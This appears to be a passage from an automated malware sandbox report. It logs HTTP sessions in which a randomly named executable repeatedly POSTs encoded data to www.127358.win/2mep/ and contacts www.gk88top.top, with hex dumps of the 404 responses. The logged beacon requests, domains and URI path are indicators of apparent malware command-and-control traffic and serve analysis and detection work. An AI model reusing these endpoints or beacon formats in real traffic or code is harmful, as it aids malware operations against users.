                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.gk88top.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Dec 13, 2024 13:07:48.401653051 CET1236INHTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:07:48 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKX7hwH%2Bi7ENN2Ve0ygdeHII8eWoAJUMwCztan0yCoA%2FLuRq%2B3R6Fd6fBi6h7daqxMQyNd2oTgMpdluwO36L129AOpXwT5Sg4%2BffglqRaLlbeeDYD3wmpB7xu8FhLnZt%2Bn8%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f15d5faffc58c47-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 [TRUNCATED]
                                                    Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%
                                                    Dec 13, 2024 13:07:48.401822090 CET662INData Raw: 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31
                                                    Data Ascii: ;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;
                                                    Dec 13, 2024 13:07:48.942686081 CET1236INData Raw: 37 66 66 61 0d 0a 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 44 43 41 59 41 41 41 43
                                                    Data Ascii: 7ffa<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEb
                                                    Dec 13, 2024 13:07:48.942747116 CET1236INData Raw: 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d 58 54 35 43 59 56 56 42 4d 41 58 4f 43 68 6b 57 63 7a 54 6c 78 2f 5a 73 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a
                                                    Data Ascii: DdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgx
                                                    Dec 13, 2024 13:07:48.942761898 CET1236INData Raw: 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38 64 7a 79 6a 6b 32 49 61 42 4b 41 4e 73 69 33 38 36 72 56 30 42 45 4d 39 57 6f 4f 77 68 6f 61 32 32 34 46 67 4f 6b 73 4b 6a 62 44 54 6e 4e 48 41 64 68 4d 59 47 59 4d 2f 6a 58 39 76 46 56
                                                    Data Ascii: EONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF
                                                    Dec 13, 2024 13:07:48.942898989 CET1236INData Raw: 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a 32 52 76 5a 4b 52 66 5a 6f 73 6e 50 6b 73 6a 5a 6e 34 43 6a 66 43 2f 49 70 6f 53 51 50 69 53 78 72 5a 72 78 71 4a 69 38 34 63 6f 32 43 30 39 6e 32 61 79 42 6f 50 6e 4c 74 67 78 34 77 48
                                                    Data Ascii: ysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKt
                                                    Dec 13, 2024 13:07:48.942923069 CET1236INData Raw: 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c 35 63 58 42 32 43 6f 48 56 50 2b 54 6e 72 4f 63 72 5a 2b 59 33 58 36 71 50 65 48 38 4e 65 74 4c 4e 53 4b 71 43 78 75 70 5a 51 71 34 36 50 62 6e 5a 5a 72 43 53 2f 71 67 61 45 56 2b 46 31
                                                    Data Ascii: NGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl2rae2k3OwlImNheWa3DUb9IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+
                                                    Dec 13, 2024 13:07:48.942939043 CET1236INData Raw: 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a 75 4f 6c 74 43 71 2b 30 42 31 46 6a 63 44 48 66 44 6e 68 52 79 38 51 4e 62 48 54 4a 62 73 35 69 66 38 6d 44 45 5a 39 4f 59 4e 52 50 39 42 67 31 44 39 77 55 70 4d 68 54 2f 2f 2b 72 4d 48
                                                    Data Ascii: zlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+t+NR0fM6PZq79cSEv8UmKsUSELl1rIC3GNAYw3GPW/5/0nYv7t610MuG4vtPng
                                                    Dec 13, 2024 13:07:48.942954063 CET776INData Raw: 51 70 45 54 39 74 6f 66 69 2f 6b 33 4d 4d 6e 6d 76 34 68 6e 32 34 42 38 4c 30 39 4f 38 59 51 76 4f 4c 6f 67 65 2f 5a 67 76 30 2f 77 57 4a 64 2f 4f 63 4a 67 58 75 61 32 70 51 4c 31 67 72 63 51 7a 6d 4c 56 51 4b 39 74 6d 42 41 6f 7a 62 67 79 4e 34
                                                    Data Ascii: QpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmBAozbgyN4sIAF2Pgf/JAxGfXWDUT8VQDyIZkCuXG0XH412yrg2jUNeWrCpIgQ6AY2q70MGAnrgkiUbalqXd+QkJGxwtp/FyiVkYAvk38CllDs/n+z9P+5uWkJ3lu9LSICPl6CeM/di/JaI/eu2Bmq9mwvE2d1+zsMfwGDIu4vL
                                                    Dec 13, 2024 13:07:48.942970037 CET1236INData Raw: 79 39 77 49 48 4d 2b 76 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36
                                                    Data Ascii: y9wIHM+vLj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgi
                                                    Dec 13, 2024 13:07:48.943135023 CET1236INData Raw: 78 49 55 72 69 58 61 77 79 55 4f 71 31 65 39 38 4c 4f 51 67 38 73 65 49 74 32 55 76 64 68 34 2b 66 75 6d 35 2b 39 66 36 77 77 37 74 64 6e 55 6e 44 41 2b 70 45 47 48 66 56 38 63 32 35 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35
                                                    Data Ascii: xIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdV


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.749902206.238.89.119806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:07:56.117201090 CET859OUTPOST /2mep/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.127358.win
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 219
                                                    Cache-Control: no-cache
                                                    Origin: http://www.127358.win
                                                    Referer: http://www.127358.win/2mep/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 44 6a 6e 6f 62 4d 75 69 6f 6c 36 49 4c 70 7a 32 4f 4d 66 30 49 4d 53 78 2b 65 6a 6a 74 4c 4e 72 56 35 2b 57 62 6f 51 36 39 41 72 4b 6d 70 63 44 4e 48 36 6e 2f 7a 4c 45 36 66 77 62 4a 70 71 61 75 30 6f 4c 69 54 51 37 50 46 73 7a 34 46 6e 45 4c 2b 43 75 31 2b 44 52 76 74 45 51 54 51 43 38 65 6b 39 55 41 53 73 4b 4d 66 6c 76 66 52 4e 75 4f 31 71 65 4a 66 39 75 61 6f 32 51 75 47 70 30 44 2b 59 71 58 75 72 49 4c 41 45 2b 4b 2b 2b 78 35 74 43 6a 39 41 31 54 62 65 46 4b 69 44 32 34 6d 57 53 46 65 6f 6e 6b 6d 6d 5a 37 39 76 7a 78 6f 58 71 75 4f 30 71 6e 51 34 58 37 35 57 69 67 71 4e 55 2f 51 3d 3d
                                                    Data Ascii: UZkt_p=duT9QTO+95xe8DjnobMuiol6ILpz2OMf0IMSx+ejjtLNrV5+WboQ69ArKmpcDNH6n/zLE6fwbJpqau0oLiTQ7PFsz4FnEL+Cu1+DRvtEQTQC8ek9UASsKMflvfRNuO1qeJf9uao2QuGp0D+YqXurILAE+K++x5tCj9A1TbeFKiD24mWSFeonkmmZ79vzxoXquO0qnQ4X75WigqNU/Q==
                                                    Dec 13, 2024 13:07:57.651676893 CET691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:07:57 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.749911206.238.89.119806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:07:58.773279905 CET879OUTPOST /2mep/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.127358.win
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 239
                                                    Cache-Control: no-cache
                                                    Origin: http://www.127358.win
                                                    Referer: http://www.127358.win/2mep/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 76 4e 73 30 4a 2b 48 76 63 51 33 64 41 72 53 32 70 64 64 39 48 48 6e 2f 2f 31 45 37 6a 77 62 4e 4a 71 61 75 45 6f 4c 52 4c 66 34 2f 46 35 37 59 46 70 62 37 2b 43 75 31 2b 44 52 76 35 2b 51 58 38 43 38 75 55 39 57 68 53 6a 41 73 66 6d 73 66 52 4e 34 4f 31 75 65 4a 66 62 75 62 45 63 51 6f 4b 70 30 42 32 59 71 47 75 6f 43 4c 41 43 6a 36 2f 39 67 34 77 6e 76 76 59 4f 58 4a 71 6c 49 52 4c 49 35 51 58 77 66 38 6b 4c 36 33 65 69 2f 2f 4c 46 6d 4f 4b 66 73 50 77 79 71 79 4d 32 6b 4f 7a 49 74 34 73 51 70 6f 44 34 79 55 4e 42 76 35 6d 62 39 76 57 56 68 70 77 54 4f 2f 59 3d
                                                    Data Ascii: UZkt_p=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifvNs0J+HvcQ3dArS2pdd9HHn//1E7jwbNJqauEoLRLf4/F57YFpb7+Cu1+DRv5+QX8C8uU9WhSjAsfmsfRN4O1ueJfbubEcQoKp0B2YqGuoCLACj6/9g4wnvvYOXJqlIRLI5QXwf8kL63ei//LFmOKfsPwyqyM2kOzIt4sQpoD4yUNBv5mb9vWVhpwTO/Y=
                                                    Dec 13, 2024 13:08:00.326000929 CET691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:00 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.749918206.238.89.119806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:08:01.432712078 CET1892OUTPOST /2mep/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.127358.win
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1251
                                                    Cache-Control: no-cache
                                                    Origin: http://www.127358.win
                                                    Referer: http://www.127358.win/2mep/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 6e 4e 73 47 42 2b 56 34 41 51 32 64 41 72 62 57 70 51 64 39 48 57 6e 2f 6e 78 45 37 75 46 62 4c 46 71 62 4e 4d 6f 44 41 4c 66 6a 50 46 35 33 34 46 6f 45 4c 2b 58 75 31 76 72 52 76 70 2b 51 58 38 43 38 73 4d 39 53 77 53 6a 47 73 66 6c 76 66 51 43 75 4f 31 47 65 4a 47 67 75 62 77 6d 54 59 71 70 78 52 6d 59 6c 55 32 6f 41 72 41 41 69 36 2f 66 67 34 38 30 76 76 45 6f 58 4e 71 62 49 53 72 49 31 6b 53 66 48 73 6b 41 76 78 4b 52 38 38 6e 61 6c 75 43 41 31 4f 31 50 73 6c 59 69 71 4f 50 65 6c 61 45 35 72 63 61 61 6e 6d 70 31 6b 62 7a 4c 7a 62 44 6e 36 4a 77 78 64 6f 56 45 4f 59 35 55 44 2b 32 51 6f 33 72 68 31 45 31 61 77 77 6f 6d 49 59 65 52 66 44 4b 56 67 35 4b 6b 66 6d 57 47 73 79 74 54 68 45 44 6c 71 51 57 67 41 4b 32 5a 67 76 69 66 35 70 46 69 6a 6f 2f 34 4c 49 74 58 6f 73 46 67 51 74 4b 37 2b 46 6b 44 39 66 2b 34 5a 78 39 58 72 70 68 36 68 56 4b 35 4f 4d 63 [TRUNCATED]
                                                    Data Ascii: UZkt_p=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifnNsGB+V4AQ2dArbWpQd9HWn/nxE7uFbLFqbNMoDALfjPF534FoEL+Xu1vrRvp+QX8C8sM9SwSjGsflvfQCuO1GeJGgubwmTYqpxRmYlU2oArAAi6/fg480vvEoXNqbISrI1kSfHskAvxKR88naluCA1O1PslYiqOPelaE5rcaanmp1kbzLzbDn6JwxdoVEOY5UD+2Qo3rh1E1awwomIYeRfDKVg5KkfmWGsytThEDlqQWgAK2Zgvif5pFijo/4LItXosFgQtK7+FkD9f+4Zx9Xrph6hVK5OMcTzRge4GruFIdyfzCWNwT5onehJTsuSyY/PzN/HGOa1Q44LWq35wy8sYL/lSvJ9MYs0UJnNae//tYbg9mX0JMm4erJQdRQ0uONjwfwtT6t24BAMTehRf/d/VUsmM6X5sag1VqzkyECW8V2yHi9MzVEUmFFCZy4r47gWhTAJ+pMSueMISxgXsmL5GnQpXo4flkzlG3rKcdvGOE23UxAft9BDpnKYiXfZcOqaCxCrDy/cOIPgRyapOTq8yLCVsdbQEHGLaXN0x4xvR6mgipHrKYklAh68x1kOSu6Qu4K4UhkzUccZrdWbe8J1P3MRnU82qnG8PbOl4MN5Ney4h5yAXvd6zXsL1ThLuSbaNCXmxh7LACaE5yMgcvINi6lFQ/3VJZf0rftnQ+n1UtsStte2Gj9CyIKssXAC9psdBvEVw7XDLIDz3ISq/L7+/cPwlxTn1LDP1MHoa7gYAeTJCsKfaoO4hYn8KspLsyQLv1sGPlTU61ecZdjN3oDv6d13kCXavUKTKoquTsRfKuEhRbSBLCVSUdesUIV0skMOeAmXnwm0sMlykkNbC2jI5VOGePQEvoRHb9nVQUE076UXcwNanMYLLMjQ2PSZLkev/Ten3f3XY1Fhiqr1PhCjds/xoIaIBu+dTKd+5hlPcye2vvLjEB2jvrPOg1tT0CQq [TRUNCATED]
                                                    Dec 13, 2024 13:08:02.988624096 CET691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:02 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.749924206.238.89.119806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
